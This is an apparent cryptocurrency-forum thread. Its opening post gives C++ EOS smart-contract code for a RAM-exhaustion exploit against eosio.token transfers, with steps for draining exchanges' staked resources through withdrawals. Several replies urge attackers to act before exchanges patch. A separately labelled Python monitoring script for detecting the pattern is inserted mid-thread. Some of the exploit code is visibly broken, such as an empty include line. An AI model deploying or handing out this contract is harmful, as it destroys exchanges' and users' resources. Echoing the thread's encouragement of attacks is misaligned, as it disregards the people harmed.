DISCLAIMER: This is for educational purposes only. I am not responsible for anything that you choose to do with this information. I strongly recommend that you do not deploy a contract like this.
the eosio.token in EOS has an exploit where you can take user's ram and steal their resources. Exploit was discovered a little while ago but I just checked, and a tonne of exchanges (including binance) and dapps are still vulnerable to it.
im not going to do the exploit myself in case the feds catch me or some shit lol, but ill explain how it works, so if any other devs or blackhats want to have some fun and do it yourself, be my guest ;). Granted, you will probably have to be a little familiar with how eos smart contracts and the eos API works.
in a smart contract, there is an event listener function called "apply", it listens to any incoming events on the contract and then executes a handler. inside the handler you can reference other functions in your contract.
here is the apply function:

    extern "C" {
        /// The apply method implements the dispatch of events to this contract
        void apply( uint64_t receiver, uint64_t code, uint64_t action ) {
            if(action == N(transfer)) { //Here we make sure that the action is a `transfer` action from any contract that is or follows eosio.token standard
                //Here is the handler for the event where we can put our exploit function
                exploit_function(receiver);
            }
        }
    }

before we go any further we have to include the currency.hpp file so that we can get a reference to the `transfer` struct and then get person who sent the action (it'll be more clear why we need this in a minute):

    #include //This uses `currency` as a namespace.

okay now we have all of the user's permissions that let us write data on his/her behalf. Now we can have some fun.
lets define a table struct and a multi_index table so that you can store data that the user has given us permissions to do on behalf of them kek.

    struct exploit_table {
        uint64_t a;
        uint64_t b;
        uint64_t c;
        uint64_t d;
    }
    typedef eosio::multi_index< N(exploittable), exploit_table > exploittable; //Multi_index table (name of the table cant have any snake_case or camelCase in it)

here is an example of an exploit function:

    //We pass in `receiver` from the `apply` function which is a reference to our malicious contract
    void exploit_function(self) {
        auto data = unpack_action_data(); //Unpacking the transfer struct from the currency namespace that we got from including currency.hpp
        account_name person_we_are_going_to_pwn = data.from;
        exploittable get_rekt_scrub(self, self); //Initialise the table scoped to `self, self` (it doesnt matter really as long as the first parameter is `self`)
        for(uint i = 0; i < 100; ++i) { //(make sure this for loop isnt too big or the action will throw an error). Instead you can just call it multiple times.
            get_rekt_scrub.emplace(person_we_are_going_to_pwn,[&](auto& table_ref){
                table_ref.a = 100;
                table_ref.b = 100;
                table_ref.c = 100;
                table_ref.d = 100;
            });
        }
    }

Now you can make a Eos withdraw from an exchange or app to this contract. Every time an exchange sends you their EOS, you will eat up their RAM. Make multiple withdraws and their resources will be drained. “””IF”””” Someone did this, they would basically burn all of the exchanges' staked EOS. Which is probably millions of EOS or $10’s or even $100’s of millions worth of EOS that gets destroyed and never returned… Literally the DAO 2.0
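
Added example, not part of the original post or thread: a monitoring check that an account operator could run over action traces to spot the behaviour described above, where a contract notified of a `transfer` stores rows with the sender as RAM payer. The trace field names (`receipt.receiver`, `act`, `account_ram_deltas`) are assumed to follow nodeos action-trace JSON; the account names, sample traces and the helper `ram_billed_to_sender` are constructed for illustration.

```python
# Added example: flag transfer notifications in which the notified contract
# billed RAM to the token sender. Field names are assumed to follow nodeos
# action-trace JSON; sample traces and account names are constructed.

TRANSFER = {"account": "eosio.token", "name": "transfer",
            "data": {"from": "exchangeacct", "to": "somecontract",
                     "quantity": "1.0000 EOS", "memo": ""}}

SAMPLE_TRACES = [
    # The token contract executing the transfer itself (receiver == act.account);
    # its own billing for a new balance row is not a notification and is skipped.
    {"receipt": {"receiver": "eosio.token"}, "act": TRANSFER,
     "account_ram_deltas": [{"account": "exchangeacct", "delta": 240}]},
    # Notification to the recipient contract, which stored rows paid by `from`.
    {"receipt": {"receiver": "somecontract"}, "act": TRANSFER,
     "account_ram_deltas": [{"account": "exchangeacct", "delta": 12400}]},
    # Notification where the recipient pays for its own rows: not flagged.
    {"receipt": {"receiver": "gooddapp"},
     "act": {"account": "eosio.token", "name": "transfer",
             "data": {"from": "exchangeacct", "to": "gooddapp",
                      "quantity": "2.0000 EOS", "memo": ""}},
     "account_ram_deltas": [{"account": "gooddapp", "delta": 240}]},
]


def ram_billed_to_sender(traces, min_bytes=1):
    """Return one finding per transfer notification that charged RAM to `from`."""
    findings = []
    for trace in traces:
        act = trace.get("act", {})
        receiver = trace.get("receipt", {}).get("receiver")
        # Only notifications: the handler runs in a contract other than the token.
        if act.get("name") != "transfer" or receiver == act.get("account"):
            continue
        data = act.get("data")
        if not isinstance(data, dict):  # data left as hex when no ABI was available
            continue
        sender = data.get("from")
        billed = sum(d["delta"] for d in trace.get("account_ram_deltas", [])
                     if d["account"] == sender and d["delta"] > 0)
        if billed >= min_bytes:
            findings.append({"sender": sender, "billed_by": receiver, "bytes": billed})
    return findings


if __name__ == "__main__":
    for finding in ram_billed_to_sender(SAMPLE_TRACES):
        print(finding)
```

Raising `min_bytes` turns the check into an alert threshold, and grouping the findings by `billed_by` gives the list of recipient contracts to block for outgoing transfers.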
Juan Diaz
heh code came out shit. Here is a picture of a full contract so you can read it better.
wew lad. I literally showed you how you can destroy the eos network and burn all of the exchanges EOS funds and get no replies.
Meanwhile, threads like "tulip mania 2.0" get hundreds. fuck you biz. im out. Enjoy your bags.
Youll also need to define the types and actions in an ABI file but I cba to write one out, but here is the documentation for it: developers.eos.io
Connor Ross
who are you talking to?
Zachary Gutierrez
Very few people here on biz program, even fewer have experience with coding smart contracts, and almost no one here ever tried the EOS ones. So most don't even know how to start with the info you gave, and the few who do would try right away instead of replying. But I do know the info is legit. Thanks for sharing.
Noah Brooks
Non programmer here. Is this legit? Are we going to witness EOS implode?
So is it fixed or are hackers going to take advantage of the exploit? I don’t have any EOS just curious
Noah Miller
huh, it's sort of like the DAO reentrancy bug, except worse, because it appears to be unpatchable without fundamentally changing how EOS works.
Ayden Davis
this, people who get it are probably working on it, the rest has no fucking clue what the fuck you just said.
Adrian Young
Because I'm looking at it. There aren't that many devs on Jow Forums. I'm considering what to do with this.
Josiah Jackson
there's no eos on shapeshift. Buying it anonymously seems hard, and other people are probably way ahead of me in trying to exploit it. I hope it hurts binance and other exchanges and leads to delisting of eos
It will take a few hours or so for it to spread within the community. When the ICON exploit was found, it took probably 3 hours or so
Levi Scott
the icon exploit was a big nothing, it was only irritating
Landon Stewart
because no one has done it yet..
If you're going to do it, you should probably do it soon btw. People are talking about it now. Only a matter of time before exchanges get the word and disable withdrawals/implement a proxy contract so it no longer affects them.
Caleb Long
>bullshit
Nigga, the dev team acknowledged it. It's just that, from what I got, it drains the EOS from the target, but the attacker doesn't get it, so incentive is low.
i didnt really explain this either but basically you have to deploy the contract. then make a withdrawal from the exchange to the smart contract and their staked eos and resources get used up/burned.
Brandon Bell
from what I understand even if this works the only thing you could do with this is use up someone's available RAM, you wouldn't actually impact their token balance or anything
Samuel Adams
No the scatter guy acknowledged it and he is a fucking weirdo.
i mean it killed ICON though, so you can't call it nothing.
Lucas Lee
Holy shit fucking post in here. This board is busy promoting lifestyle posts when we could be witnessing a legitimately critical moment for EOS. I don’t hold any but this seems legit
Andrew Perez
Guarantee nothing comes of this.
Michael Thomas
possible, if you own eos you are already ok with emergency freezes, account lockdowns and editing. If the exploit ends up getting used BPs are only going to edit the changes back.
How did crypto even end up in that state.
William Ward
you can steal someone's ram. I don't know eos enough to know if that ram can be sold then.
Mason Lee
I don't think it "steals" their RAM it just uses up their available resources like a DDoS or something
Chase Hernandez
Well EOS is a shit coin so whatever
Lincoln Allen
Bump. Want to see Pajeets get rekt
Levi Gomez
nobody knows if you can sell it or not, because nobody understands eos.
Hudson Morales
Can someone tell me what the fuck is EOS?
Carson Watson
Have you been living under a rock?
Joseph Garcia
This is my first time ever visiting Jow Forums and I saw this thread on the front page so yes. I’m just gonna google everything said in this thread that I don’t know about
Benjamin Green
fucking love that this shit is still referenced
Carson Brooks
Whats the point if you can't receive the coins. It's not theft, just vandalism.